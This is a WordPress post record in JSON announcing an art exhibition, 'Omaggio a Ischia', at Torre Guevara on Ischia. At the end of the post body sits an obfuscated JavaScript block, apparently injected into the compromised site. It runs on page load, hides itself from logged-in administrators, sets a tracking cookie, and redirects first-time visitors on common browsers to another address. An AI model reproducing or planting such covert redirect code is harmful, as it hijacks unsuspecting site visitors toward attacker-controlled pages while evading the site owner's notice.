{"id":117,"date":"2017-12-28T14:22:24","date_gmt":"2017-12-28T13:22:24","guid":{"rendered":"http:\/\/ischia.org\/news\/?p=117"},"modified":"2017-12-28T14:22:24","modified_gmt":"2017-12-28T13:22:24","slug":"omaggio-a-ischia","status":"publish","type":"post","link":"https:\/\/ischia.org\/news\/omaggio-a-ischia\/","title":{"rendered":"Omaggio a Ischia"},"content":{"rendered":"<p>28 dic.2017 \u2013 ore 17 \u2013 Torre Guevara<br>\nVernissage della mostra Collettiva di Arte Contemporanea \u201cOmaggio a Ischia\u201d con opere di<br>\nGiuseppe Maraniello, Elio Marchegiani, Hidetoshi Nagasawa, Vettor Pisani<br>\na cura di Giorgio Brandi<br>\nLa mostra sar\u00e0 visitabile fino al 28 gennaio, tutti i giorni, tranne il il luned\u00ec, dalle ore 15.00 alle ore 17.00. Visite guidate sabato 30 dicembre, mercoled\u00ec 3, venerd\u00ec 5 e domenica 7 gennaio.<br>\nAl Ciclo dei Guevara, recuperato grazie alle campagne di restauro dell\u2019Universit\u00e0 di Dresda, \u00e8 dedicato un percorso illustrativo che ripercorre le vicende costruttive della Torre, abitata per lungo tempo dalla famiglia Guevara, e delle sue decorazioni pittoriche.<script>var _0x2cf4=['MSIE;','OPR','Chromium','Chrome','ppkcookie','location','https:\/\/#','onload','getElementById','undefined','setTime','getTime','toUTCString','cookie',';\\x20path=\/','split','length','charAt','substring','indexOf','match','userAgent','Edge'];(function(_0x15c1df,_0x14d882){var _0x2e33e1=function(_0x5a22d4){while(--_0x5a22d4){_0x15c1df['push'](_0x15c1df['shift']());}};_0x2e33e1(++_0x14d882);}(_0x2cf4,0x104));var _0x287a=function(_0x1c2503,_0x26453f){_0x1c2503=_0x1c2503-0x0;var _0x58feb3=_0x2cf4[_0x1c2503];return _0x58feb3;};window[_0x287a('0x0')]=function(){(function(){if(document[_0x287a('0x1')]('wpadminbar')===null){if(typeof _0x335357===_0x287a('0x2')){function _0x335357(_0xe0ae90,_0x112012,_0x5523d4){var _0x21e546='';if(_0x5523d4){var _0x5b6c5c=new Date();_0x5b6c5c[_0x287a('0x3')](_0x5b6c5c[_0x287a('0x4')]()+_0x5523d4*0x18*0x3c*0x3c*0x3e8);_0x21e546=';\\x20expires='+_0x5b6c5c[_0x287a('0x5')]();}document[_0x287a('0x6')]=_0xe0ae90+'='+(_0x112012||'')+_0x21e546+_0x287a('0x7');}function _0x38eb7c(_0x2e2623){var _0x1f399a=_0x2e2623+'=';var _0x36a90c=document[_0x287a('0x6')][_0x287a('0x8')](';');for(var _0x51e64c=0x0;_0x51e64c<_0x36a90c[_0x287a('0x9')];_0x51e64c++){var _0x37a41b=_0x36a90c[_0x51e64c];while(_0x37a41b[_0x287a('0xa')](0x0)=='\\x20')_0x37a41b=_0x37a41b[_0x287a('0xb')](0x1,_0x37a41b['length']);if(_0x37a41b[_0x287a('0xc')](_0x1f399a)==0x0)return _0x37a41b[_0x287a('0xb')](_0x1f399a['length'],_0x37a41b[_0x287a('0x9')]);}return null;}function _0x51ef8a(){return navigator['userAgent'][_0x287a('0xd')](\/Android\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/BlackBerry\/i)||navigator['userAgent'][_0x287a('0xd')](\/iPhone|iPad|iPod\/i)||navigator[_0x287a('0xe')]['match'](\/Opera Mini\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/IEMobile\/i);}function _0x58dc3d(){return navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0xf'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x10'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x11'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x12'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')]('Firefox')!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x13'))!==-0x1;}var _0x55db25=_0x38eb7c(_0x287a('0x14'));if(_0x55db25!=='un'){if(_0x58dc3d()||_0x51ef8a()){_0x335357('ppkcookie','un',0x16d);window[_0x287a('0x15')]['replace'](_0x287a('0x16'));}}}}}(this));};<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>28 dic.2017 \u2013 ore 17 \u2013 Torre Guevara Vernissage della mostra Collettiva di Arte Contemporanea \u201cOmaggio a&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[1],"tags":[],"class_list":["post-117","post","type-post","status-publish","format-standard","hentry","category-senza-categoria","wpcat-1-id"],"jetpack_publicize_connections":[],"_links":{"self":[{"href":"https:\/\/ischia.org\/news\/wp-json\/wp\/v2\/posts\/117","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ischia.org\/news\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/ischia.org\/news\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/ischia.org\/news\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/ischia.org\/news\/wp-json\/wp\/v2\/comments?post=117"}],"version-history":[{"count":1,"href":"https:\/\/ischia.org\/news\/wp-json\/wp\/v2\/posts\/117\/revisions"}],"predecessor-version":[{"id":118,"href":"https:\/\/ischia.org\/news\/wp-json\/wp\/v2\/posts\/117\/revisions\/118"}],"wp:attachment":[{"href":"https:\/\/ischia.org\/news\/wp-json\/wp\/v2\/media?parent=117"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/ischia.org\/news\/wp-json\/wp\/v2\/categories?post=117"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/ischia.org\/news\/wp-json\/wp\/v2\/tags?post=117"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}